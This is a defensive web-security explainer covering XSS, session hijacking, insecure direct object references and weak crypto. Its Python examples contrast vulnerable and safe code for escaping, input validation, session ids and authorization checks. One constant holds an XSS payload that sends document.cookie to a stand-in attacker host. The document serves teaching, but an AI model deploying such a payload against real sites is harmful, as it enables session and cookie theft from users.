Businesses worry about unauthorized persons breaking into the web applications they rely on. Organizations use these applications to serve customers better, but if an application is compromised, or unauthorized code is slipped into it, the business loses integrity with those customers. Protecting business applications from compromise is now a major concern, and the first step is to understand how and why applications are compromised.
Why are web apps vulnerable?
Everything a web application sends to the browser, including its HTML, JavaScript, URLs and form fields, is visible to anyone who visits the site. An attacker can study that code and then change what the browser sends back: altered form values, edited URLs, or hand-crafted requests the application never expected. If the server trusts that input, the attacker can make the application behave differently or obstruct existing functionality.
Attackers compromise web applications in the following ways, among others:

Cross Site Scripting (XSS): The attacker gets a script of their own into a page the application serves, usually through unvalidated input that the application echoes back into its HTML. The script then runs in other users' browsers with the privileges of the site, where it can steal session cookies and data or show the user false information.
Identity Theft (broken authentication and session management): The attacker takes over a user's identity, typically by stealing or guessing the session identifier the application issues after login, and then reads that user's sensitive data or acts on their behalf, causing inconvenience or loss to the user.
Direct Object Reference: This risk occurs when an internal object such as a database record, table or file is referenced directly by a value in the URL or a form field (an invoice number, for example) and the application does not check that the current user is allowed to see it. The attacker simply changes the value to reach other users' objects.
Insecure cryptography: Sensitive data such as credit card numbers, bank details and SSNs can be read by attackers if it is stored, or sent over the internet, in the clear, merely encoded (Base64, for instance, is not encryption), or encrypted with a weak or home-made algorithm.
Insufficient transport layer protection: Applications that do not encrypt data in transit, do not authenticate users before serving sensitive pages, or do not check certificates can be eavesdropped on or impersonated, letting attackers gather users' personal data.
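The XSS case from the list above, worked through as an added example (this is not code from the original article): a search page that reflects the user's query into its HTML, once without encoding and once with encoding. The page fragment, the query and the attacker's payload are constructed for the illustration; `browser_would_execute` is a crude stand-in for the browser's HTML parser, good enough to show the difference between the two renderers.

```python
import html

# Constructed attacker input: a "search query" that carries a script instead
# of a search term. The attacker.example host is a placeholder.
XSS_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/?c="'
    "+document.cookie</script>"
)


def render_results_vulnerable(query: str) -> str:
    """Reflect the user's query straight into the HTML.

    Any markup in the query becomes part of the page, so a <script> in it
    runs in the victim's browser with access to the site's cookies and DOM.
    """
    return f"<h1>Results for {query}</h1>"


def render_results_safe(query: str) -> str:
    """Encode the query for an HTML text or quoted-attribute context first.

    The browser now displays '<', '>', '&' and quotes as text and never
    parses them as tags, attributes or script.
    """
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def browser_would_execute(page: str) -> bool:
    """Crude check (not a real HTML parser) used only to compare the two
    renderers: does a raw <script tag survive in the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_results_vulnerable(XSS_PAYLOAD))
    print("safe:      ", render_results_safe(XSS_PAYLOAD))
```

Output encoding is context-specific: `html.escape` is right for text and quoted attribute values, but a value placed inside a `<script>` block, an event-handler attribute or a URL needs the encoding for that context instead. Marking the session cookie `HttpOnly` limits what a script like the payload above can steal, but it does not stop the injection itself.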
How to avoid these risks
The list above is not complete, but it covers some major areas of vulnerability. Developers, web designers and SQA/test staff can counter these vulnerabilities by being aware of them and by building in code that validates input and rejects anything that looks like an attack.
Basic Security Practices for Web Applications:
- Applications use data entered into forms to build database queries. If that data is validated before it reaches the database, injection attempts are rejected, or at least come to light in the logs. Proper validation also catches scripts and markup that an attacker types into form fields.
- Coders must assume that any data supplied by a user is untrusted. All inputs must be validated before use; checking type, length, format and range against what the field is expected to contain is the usual approach.
- Identity theft and broken authentication can be limited by expiring sessions, so that a user must log in again after a period of inactivity even if they never explicitly logged out. When a user logs in, the application issues a session id. If that id is generated from a predictable formula (a counter, a timestamp, the user name), an attacker can guess or reconstruct another user's id, send it in their own requests, and read that user's data. Session ids must be long and generated from a cryptographically secure random source.
- Unpredictable ids also make direct-object-reference attacks harder, but the real fix is an authorization check: every request for an object must verify that the logged-in user is allowed to access it. Databases should never be queried with raw user-entered data. Applications should validate it first and then hand it to the database as bound parameters rather than splicing it into the query text.
- Most importantly, the infrastructure the application runs on, including hardware, software, OS and other components, must be kept patched and securely configured.
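The first four practices above (validating form input by type, length, format and range; issuing unguessable session ids and expiring idle sessions; and checking authorization before honouring an object reference, with user data passed to the database as bound parameters) put together in one added Python example. This is illustration code written for this page, not code from the original article: the form fields, the `invoices` table, the 15-minute timeout and the sample records are all assumptions, and the in-memory `SessionStore` stands in for whatever session backend a real application uses.

```python
import re
import secrets
import sqlite3
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# ---- 1. Input validation: type, length, format and range -------------------
# Field names and rules are assumptions for a hypothetical "order" form.
ACCOUNT_ID_RE = re.compile(r"[0-9]{1,10}")            # digits only, bounded length
EMAIL_RE = re.compile(r"[^@\s]{1,64}@[^@\s]{1,189}")  # shape only, at most 254 chars


def validate_order_form(form: Dict[str, str]) -> Dict[str, object]:
    """Allow-list validation: return typed values or raise ValueError.

    Anything that does not match the expected shape is rejected, so a value
    like '42 OR 1=1' or '<script>' never reaches the database or a page.
    """
    acct = form.get("account_id", "")
    if not ACCOUNT_ID_RE.fullmatch(acct):
        raise ValueError("account_id must be 1-10 digits")
    qty = form.get("quantity", "")
    if not re.fullmatch(r"[0-9]{1,3}", qty) or not 1 <= int(qty) <= 100:
        raise ValueError("quantity must be an integer from 1 to 100")
    email = form.get("email", "")
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("email has an invalid format")
    return {"account_id": int(acct), "quantity": int(qty), "email": email}


def is_valid_order_form(form: Dict[str, str]) -> bool:
    try:
        validate_order_form(form)
        return True
    except ValueError:
        return False


# ---- 2. Session ids: unguessable, and expired when idle --------------------
IDLE_TIMEOUT = 15 * 60  # assumed: seconds of inactivity before re-login is forced


@dataclass
class Session:
    user_id: int
    last_seen: float


class SessionStore:
    """In-memory session store. Ids come from secrets.token_urlsafe (a CSPRNG),
    so knowing one id, a timestamp or a user name gives no way to guess another.
    A predictable scheme such as f"{user_id}:{login_count}" is what the article
    warns against."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self._sessions: Dict[str, Session] = {}
        self._clock = clock  # injectable so the timeout can be exercised in a test

    def create(self, user_id: int) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits of entropy, 43 URL-safe chars
        self._sessions[sid] = Session(user_id, self._clock())
        return sid

    def user_for(self, sid: str) -> Optional[int]:
        """Resolve a presented id; an idle session is dropped, forcing re-login."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess.last_seen > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        sess.last_seen = now
        return sess.user_id


# ---- 3. Object references: authorise the owner, bind the parameters --------
def build_sample_db() -> sqlite3.Connection:
    """Constructed sample table: two invoices belonging to users 7 and 8."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner INTEGER, amount TEXT)")
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?)",
                     [(101, 7, "19.99"), (102, 8, "250.00")])
    return conn


def get_invoice_vulnerable(conn: sqlite3.Connection, invoice_id: int) -> Optional[tuple]:
    """Direct object reference: whatever id the user puts in the URL is returned."""
    return conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ?",
                        (invoice_id,)).fetchone()


def get_invoice(conn: sqlite3.Connection, invoice_id: int, user_id: int) -> Optional[tuple]:
    """Return the row only if it belongs to the logged-in user. The bound
    parameters (?) keep user data out of the SQL text, and 'missing' and
    'not yours' look identical, so ids cannot be enumerated."""
    return conn.execute("SELECT id, owner, amount FROM invoices WHERE id = ? AND owner = ?",
                        (invoice_id, user_id)).fetchone()
```

In a real application the session id travels in a cookie flagged `Secure` and `HttpOnly`, the store lives outside the process, and the owner check in `get_invoice` is done for every object type, not just invoices.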
